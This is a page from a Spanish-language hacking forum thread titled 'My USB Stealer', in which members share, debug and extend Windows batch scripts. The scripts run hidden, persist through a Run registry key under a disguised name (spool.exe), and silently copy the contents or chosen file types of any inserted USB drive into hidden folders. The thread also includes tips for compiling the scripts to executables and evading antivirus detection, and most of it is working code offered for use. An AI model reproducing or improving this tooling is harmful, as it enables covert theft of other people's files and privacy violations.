elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  My USB Stealer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: My USB Stealer  (Leído 17,189 veces)
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: My USB Stealer
« Respuesta #10 en: 31 Octubre 2008, 23:07 pm »

Muy seguramente estan haciendo uso dle codigo que esta mas arriba....y ese tiene una linea de codigo que muestra ese aviso... y pues es para eso..para que avise...

Código:
:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

aunque deberian usar la que postee mas abajo en el cual ya quite esa funcion...simplemente empieza a escanear con base en los dos archivos previamente configurados por la interfaz...y todo lo hace da manera silenciosa....

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Saludos.


En línea


estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #11 en: 18 Noviembre 2008, 20:17 pm »

oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias


En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #12 en: 19 Noviembre 2008, 14:31 pm »

Si lees los códigos que hice yo al principio del post verás que justamente lo que explican es cómo hacértelo tú mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional.

Intenta hacerlo tú, y si tienes algún problema con los códigos en batch o al compilar me comentas  ;)
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #13 en: 19 Noviembre 2008, 16:57 pm »

corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informática). Sólo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/
Me encantaría que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ¿lo guardo en un txt con alguna extensión especifica? ¿como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/
Gracias por tu ayuda de verdad

Código:
@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensión .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensión a .ini y tampoco sirve. Es como si no pudiera cambiar la extensión de los archivos del bloc de notas. A mi me suena que antes podía ¿que ha podido pasar? habre cambiado algo de la configuración del ordenador sin querer?. Lo digo porque sino puedo crear la extensión que requiera este programa quizas podrias mandarme un alrchivo con esa extensión. En fin estoy aquí a la expectartiva e impaciente. Gracias y un saludo
« Última modificación: 19 Noviembre 2008, 17:13 pm por estudcom » En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #14 en: 19 Noviembre 2008, 22:34 pm »

Hola estudcom,

Hay un par de cosas del code que debes cambiar:

Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del código:

Código original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraíble, es decir, E, F, G, H y las que tú le quieras meter si creas más redirecciones)

Códig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I

Es decir, en la segunda ruta especificas la dirección a la que se va a copiar.
(NOTA: Veo que has puesto la dirección de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])

Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizá no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas símplemente "Prueba"). ¿Qué pasa en ese caso? Que al ponerle extensión .bat realmente no le estás dando una nueva extensión, ya que las tienes ocultas, sino que  al archivo "prueba" le estás dando el nuevo nombre de "prueba.bat", siendo la extensión de ambos la de .txt

Resumiendo, no le estás cambiando realmente la extensión al archivo, sino que estás haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pestaña "herramientas" en cualquier carpeta, de ahí a la opción "opciones de carpeta", y una vez ahí selecciona la pestaña "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmárcala si está marcada.

De todas maneras este código no está pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.

Si te fijas, en las primeras líneas de código está la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
¿Qué significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensión .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.

Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las últmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que también sale.



Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en último término spool.exe) debes cambiar el nombre en la rama de:

copy /y %0 "%PROGRAMFILES%\USB\spool.exe"

y en la de:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f

De la misma manera, si quieres copiarlo a otra carpeta, sólo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas líneas.
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #15 en: 20 Noviembre 2008, 16:12 pm »

guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas:
He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versión este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahí estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que después le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se está usando.
Pregunta: ¿No hay alguna forma de que ese mensaje no salte?
El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo así y hasta que no le doy a finalizar programa no se reinicia el ordenaodr
Pregunta: ¿esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga.

Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ¿así lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automáticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando.

Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicación) sigue copiando archivos de los pen drive que se introduzcan: ¿Como se desinstala esta aplicación completamanete?. Además me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ¿esto esta relacionado no?

Conclusión: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura.
Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ¿como se introduce en el codido que te he puesto?.
Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje.

editado-
perdona si soy pesado pero que deberia eliminar del code para que sólo copiara la unidad g o sólo la e??? He probado combinaciones y no me funciona gracias
« Última modificación: 20 Noviembre 2008, 18:10 pm por estudcom » En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: My USB Stealer
« Respuesta #16 en: 20 Noviembre 2008, 19:44 pm »

Wenas, para q se ejecute al inicio:
Código:
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NombreEtiqueta /t  REG_SZ /d "UbicacionArchivo" /f
NombreEtiqueta:Lo que tu quieras.
UbicacionArchivo:Ubicacion del archivo q se iniciara al inicio :P

Respecto a lo de q solo 'detecte' las unidades G y E puedes hacer esto:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)

un saludo ;)

PD:El programa Xcopy.exe es lo que hace que puedas copiar archivos de tu USB a la carpeta o viceversa.
En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #17 en: 20 Noviembre 2008, 20:39 pm »

gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code:
Código:
@echo off
 
If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha)
 
:betha
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t  REG_SZ /d "C:\z23856\2.exe" /f
goto alpha
 
:alpha
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto echeck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sólo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que quería saber es cual seria el code para que copie sólo la unidad e, He creado este pero no funciona:
Código:
@echo off

If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
Quizas podrías crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\
En línea

8789poli

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: My USB Stealer
« Respuesta #18 en: 21 Noviembre 2008, 17:31 pm »

Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compañero Rockox...



Mira...lo puedes descargar aqui...

http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.zip
http://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zip

El programa consta de dos codes...uno de configuracion y uno de escaneo...

USBStealer
Código:
@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ±±±±±                                               ±±±±±
echo      ±±°°°°°±                                            ±±°°°°°±
echo      ±°°°°°°°±±                                         ±°°°°°°°±
echo    ±±°°°°°°°°°±                                        ±±°°°°°°°°±±
echo   ±°°°°°°°°°°°±                                      ±±°°°°°°°°°°°°±
echo   ±°°°°°°°°°°°°±±            ²²²²²²²²²²²²²²²²²²   ±±±°°°°°°°°°°°°°°±
echo    ±±°°°°°°°°°°°°±±±     ²²²²±±°°°°°°°°°°°°±±²²²²±°°°°°°°°°°°°±±±±±
echo      ±±±±±±°°°°°°°°°±²²²²°°°°°°°°°°°°°°°°°°°°°°²²²²°°°°°°±±±±±
echo            ±±±°°°°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²±
echo                 ²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°±±²²
echo                ²²°°°°°°°°°°²²²²°°°°°°°°²²²²°°°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°°±²²²²°°°°°°°±²²²²°°°°°°°°°°°²²
echo                ²²±±°°°°°°°°°°°°°°±±±±°°°°°°°°°°°°°°°°²²
echo                 ²²²°°°°°°°°°°°°°°²²²²°°°°°°°°°°°°°°²²²²
echo                ±±²²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±±°°°°²²±°°°°°°°°°°°°°°°°°°°°°°°°°°²²°°°°°°±±
echo            ±±±°°°°°°°²²²²°°°°°°°°°°°°°°°°°°°°°²²²°°°°°°°°°°±±±±±±±
echo      ±±±±±±°°°°°°°°±±²  ²²²°°°°°°°°°°°°°°°°°°²²  ±±°°°°°°°°°°°°°°°±±
echo    ±±°°°°°°°°°°°°±±       ²°°°°°°°°°°°°°°°°°°²     ±±±±°°°°°°°°°°°°°±
echo    ±°°°°°°°°°°°±±         ²°°°°°°°°°°°°°°°°°°²         ±±°°°°°°°°°°±±
echo    ±±°°°°°°°°±±           ²°°±°°±°°±°°±°°±°°°²          ±°°°°°°°°±±
echo      ±±°°°°°±±            ²²²²²²²²²²²²²²²²²²²²          ±±°°°°°°±
echo        ±°°°±±                                             ±°°°°±
echo         ±±±±                                               ±±±±
echo.
echo              ²²² ²²² ²²  ²²²    ²² ²² ²²² ² ² ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ² ² ² ² ² ² ² ²   ²  ² ²
echo              ²   ² ² ² ² ²²² ²² ²   ² ²²² ²²  ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ²   ² ² ² ² ² ²   ²  ²   ²
echo              ²²² ²²² ²²  ²²²    ²   ² ² ² ² ² ²²² ²  ² ²²²
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Definir carpeta principal...³  ³2³ ³ Tipos de Archivos..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Iniciar Escaneo de USBs...  ³  ³4³ ³ Ayuda del Programa.. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa..        ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Documentos...  ³  ³2³ ³ Imagenes ^& Fotos..       ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Musica ^& Audio ³  ³4³ ³ Documentos ^& Imagenes..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Videos *       ³  ³6³ ³ Todas las Opciones... *  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
 
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan
Código:
@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.

Que cosa mas presiosa :D
me encanto XD
En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #19 en: 21 Noviembre 2008, 19:40 pm »

Vamos a ver que os estáis liando un poco...

Te aclaro lo que intentabais averiguar WestOn y tú...

Para añadir nuevas unidades al chequeo hay que seguir este patrón:

· Escaneamos la primera unidad (P.E: la E)
· Si existe, pasamos a la fase de copiado de esa unidad
· Si no existe, pasamos a la fase de chequeo de la unidad siguiente
· Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
· Cuando lleguemos a la última unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.

De otro modo no funcionará.


Respecto al proceso XCOPY.exe que estaba en ejecución... si te fijas en el código se hace referencia al xcopy. ¿Qué es esto? Pues es un archivo ejecutable que funciona a través de la cmd y cuya función es copiar, en este caso el contenido íntegro de las memorias flash.

Si en vez de copiarlo todo sólo quieres copiar un cierto tipo de archivos, cambia la parte del código (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensión del tipo de archivos que quieras copiar. Puedes usar varias líneas para copiar distintos tipos de archivo. Me explico:

En caso de que quisieras copiar archivos de PowerPoint, cambiarías esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I

Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I

Y así para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I

Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de más de ocho letras o con espacios, o extensiones de más de tres letras (Formato 8/3) debes entrecomillar la ruta completa.

